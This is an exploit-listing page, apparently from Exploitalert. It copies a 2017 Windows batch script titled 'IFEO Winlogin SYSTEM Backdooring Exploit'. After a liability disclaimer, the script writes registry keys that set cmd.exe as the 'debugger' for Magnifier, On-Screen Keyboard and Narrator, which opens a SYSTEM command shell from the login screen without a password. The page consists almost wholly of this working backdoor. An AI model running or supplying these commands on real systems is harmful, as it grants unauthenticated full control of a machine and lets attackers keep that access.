Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017040138

Below is a copy:

Microsoft Windows IFEO Winlogin SYSTEM Backdooring Exploit@ECHO OFF
REM  Microsoft Windows 'IFEO' Winlogin SYSTEM Backdooring Exploit
REM  Todor Donev <todor.donev@gmail.com>
REM  https://www.ethical-hacker.org/
REM  https://www.facebook.com/ethicalhackerorg
REM  https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/  
REM  Disclaimer:
REM  This or previous programs is for Educational purpose ONLY. Do not use it without permission.
REM  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any
REM  damages caused by direct or indirect use of the information or functionality provided by these
REM  programs. The author or any Internet provider bears NO responsibility for content or misuse
REM  of these programs or any derivatives thereof. By using these programs you accept the fact
REM  that any damage (dataloss, system crash, system compromise, etc.) caused by the use
REM  of these programs is not Todor Donev's responsibility.
REM  Use them at your own risk!

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnifier.exe" /v Debugger /t REG_SZ /d "%COMSPEC%"
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /t REG_SZ /d "%COMSPEC%"
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe" /v Debugger /t REG_SZ /d "%COMSPEC%"

Copyright ©2017 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.